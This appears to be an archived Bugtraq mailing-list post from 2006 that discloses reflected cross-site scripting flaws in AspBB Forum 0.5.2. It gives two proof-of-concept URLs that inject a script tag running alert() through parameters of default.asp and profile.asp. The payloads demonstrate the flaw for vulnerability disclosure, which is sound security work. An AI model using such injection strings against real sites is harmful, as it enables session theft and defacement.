[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
AspBB Forum "profile.asp & default.asp" XSS Vulnerability
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: AspBB Forum "profile.asp & default.asp" XSS Vulnerability
- From: "TeufeL Online" <teufel@xxxxxxxxxxx>
- Date: Thu, 18 May 2006 10:37:53 +0000
This xss works on Aspbb Forums
Homapage : http://www.aspbb.org
Version : 0.5.2
Exploit:
http://www.example.com/default.asp?action=";><script>alert('Xss
Vulnerability');</script>
http://www.example.com/profila.asp?get=";><script>alert('Xss
Vulnerability');</script>&URL=%2FDefault%2Easp%3F
TeufeL // Netkabus.Com Research And Develop Group
_________________________________________________________________
Real-time chat with your friends - Free download - MSN Messenger
http://messenger.msn.com/?mkt=tr